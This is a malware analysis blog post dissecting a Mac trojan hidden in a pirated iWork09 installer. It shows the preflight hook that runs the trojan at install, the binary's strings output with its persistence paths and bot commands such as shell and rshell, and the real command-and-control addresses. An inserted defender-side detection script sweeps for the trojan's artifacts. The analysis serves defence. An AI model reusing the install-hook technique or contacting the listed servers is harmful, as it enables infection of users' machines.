iWork/CS4 Trojan In-Depth Analysis
Last week’s Intego trojan alert caught quite a bit of attention in the Mac community and was picked up by probably every IT news site around the world. As this might be the first really serious trojan to threaten Mac OS X users, let’s go and try to analyze it.
First, this is a Universal Binary, so it affects both Intel- and PowerPC-based Macs.

The SHA-1 fingerprint of iworkservices is 55d754b95ab9b34bdd848300045c3e11caf67ecf.
The iWork09 package is basically a repackaged version of the iWork09 Trial download from apple.com, with a serial number included to unlock it. To add their trojan/backdoor to the package, they had to do some work first.

What you see is the content of the iWork09Trial.mpkg install package. Both Info.plist and iWorkTrial.dist control the behaviour of the installation process of the whole package. Sub-packages are listed here.
from the Info.plist
from the iWorkTrial.dist
Now, the iWorkServices.pkg install package contains the usual files created by Apple’s Package Maker, a pretty nifty, straightforward and GUI-based tool for creating installation packages for Mac OS X*.
*Available from within the Developer Tools.

The interesting files here are preflight, a script which the installer executes before the actual program install, and iworkservices, which is the trojan itself.
#!/bin/sh
"$1/Contents/Resources/iworkservices" &
The preflight script simply executes the trojan in a shell, where $1 is the argument the installer passes in: the on-disk path to the install package.
Now comes the interesting part. Running otool revealed that it’s not an Objective-C program but a C/C++ one. Furthermore, running strings on iworkservices yields some details of the trojan’s behaviour.
__dyld_make_delayed_module_initializer_calls
__dyld_mod_term_funcs
/usr/lib/libSystem.B.dylib
__cxa_atexit
__cxa_finalize
atexit
/System/Library/StartupItems/iWorkServices
/usr/bin/iWorkServices
cp %s %s
/System/Library/StartupItems/iWorkServices/StartupParameters.plist
/System/Library/StartupItems/iWorkServices/iWorkServices
chmod 755 /System/Library/StartupItems/iWorkServices/iWorkServices
Description = "iWorkServices";
Provides = ("iWorkServices");
Requires = ("Network");
OrderPreference = "None";
#!/bin/sh
/usr/bin/iWorkServices &
iWorkServices
socks
system
httpget
httpgeted
rand
sleep
banadd
banclear
p2plock
p2punlock
nodes
leafs
unknowns
p2pport
p2pmode
p2ppeer
p2ppeerport
p2ppeertype
clear
p2pihistsize
p2pihist
platform
script
sendlogs
uptime
shell
rshell
GET %s HTTP/1.0
GET %s HTTP/1.0
Host: %s
Accept: text/html
Content-Length
/tmp/.iWorkServices
p2pnodes
%s:%d
/dev/urandom
%.2X
http://
PANIC: unprotected error in call to Lua API (%s)
[...]
excerpt from the output of strings, see full output here
As you can see, it first copies itself to /System/Library/StartupItems/iWorkServices and /usr/bin/iWorkServices, creates a StartupParameters.plist configuration file, sets rwxr-xr-x permissions on the executable and finally runs itself from /usr/bin/iWorkServices. Note the Requires = (“Network”); line in the configuration file, which means the Startup Item will be launched by launchd once a network connection is available.
As some people already found out, this trojan is actually a bot program. The commands the bot can receive from the master server are listed below.
socks
system
httpget
httpgeted
rand
sleep
banadd
banclear
p2plock
p2punlock
nodes
leafs
unknowns
p2pport
p2pmode
p2ppeer
p2ppeerport
p2ppeertype
clear
p2pihistsize
p2pihist
platform
script
sendlogs
uptime
shell
rshell
p2pnodes
So this looks like it’s a Peer-to-Peer botnet. When started, it connects to the master server(s) serving at 69.92.177.146:59201 and qwfojzlk.freehostia.com:1024 using HTTP and downloads a list of all other p2p nodes to /tmp/.iWorkServices.
GET %s HTTP/1.0
GET %s HTTP/1.0
Host: %s
Accept: text/html
Content-Length
/tmp/.iWorkServices
p2pnodes
%s:%d
/dev/urandom
%.2X
http://
Right after that it’ll go to sleep until it receives commands from the master server.
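A defender-side sweep for the persistence artifacts and the /tmp node list described above, as an added example that is not part of the original post. The function names are mine; the paths and the SHA-1 are the ones quoted from the strings output and the hash given earlier.

```shell
#!/bin/sh
# Added example, not from the original post: sweep a volume root for the
# persistence artifacts and node-list file the strings output reveals.
# ROOT is a parameter so a mounted image or a test tree can be checked.

IWS_SHA1="55d754b95ab9b34bdd848300045c3e11caf67ecf"   # sample hash from the post

# Paths the trojan creates, relative to the volume root (from the strings output).
iws_artifact_paths() {
    cat <<'EOF'
System/Library/StartupItems/iWorkServices
System/Library/StartupItems/iWorkServices/StartupParameters.plist
System/Library/StartupItems/iWorkServices/iWorkServices
usr/bin/iWorkServices
tmp/.iWorkServices
EOF
}

# Print every artifact present under $1; exit 0 if any was found, 1 otherwise.
iws_find_artifacts() {
    root="${1:-/}"; found=1
    for rel in $(iws_artifact_paths); do
        p="${root%/}/$rel"
        if [ -e "$p" ]; then printf 'FOUND %s\n' "$p"; found=0; fi
    done
    return "$found"
}

# Flag any StartupItem whose StartupParameters.plist declares the
# iWorkServices service, even if the item directory itself was renamed.
iws_scan_startupitems() {
    dir="${1:-/}"; dir="${dir%/}/System/Library/StartupItems"
    [ -d "$dir" ] || return 1
    grep -l 'Provides *= *("iWorkServices")' "$dir"/*/StartupParameters.plist 2>/dev/null
}

# Compare a file's SHA-1 with the sample hash. Exit 0 on match, 1 on mismatch
# or missing file, 2 if neither sha1sum nor shasum is available.
iws_hash_matches() {
    [ -f "$1" ] || return 1
    if command -v sha1sum >/dev/null 2>&1; then h=$(sha1sum "$1" | cut -d' ' -f1)
    elif command -v shasum >/dev/null 2>&1; then h=$(shasum -a 1 "$1" | cut -d' ' -f1)
    else return 2; fi
    [ "$h" = "$IWS_SHA1" ]
}

# Sweep the live system, or set ROOT to a mounted image's root.
iws_find_artifacts "${ROOT:-/}" || echo "no iWorkServices artifacts under ${ROOT:-/}"
iws_scan_startupitems "${ROOT:-/}" || true
```

Any file the sweep reports should still be hashed against the sample before being treated as this exact build, since the same paths could be reused by a later variant.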
What’s also interesting is the mention of the Lua API.
PANIC: unprotected error in call to Lua API (%s)
Lua is a powerful yet small embeddable scripting language. It seems the bad guys are making their lives easier, too.
Disassembling the whole trojan gave about 43,000 lines of code, but this probably includes the Lua API set. If anyone has some spare time left, grab the code here.
According to Intego, as of Jan 22, 20,000 people had already downloaded this pirated copy. So we have a botnet of 20,000+ Macs, supposedly already running DDOS attacks against some sites using a PHP script.
If anyone is investigating this botnet a little further, please let me know.
Thanks go to Methusela Cebrian Ferrer from iThreats for the initial sight into the trojan.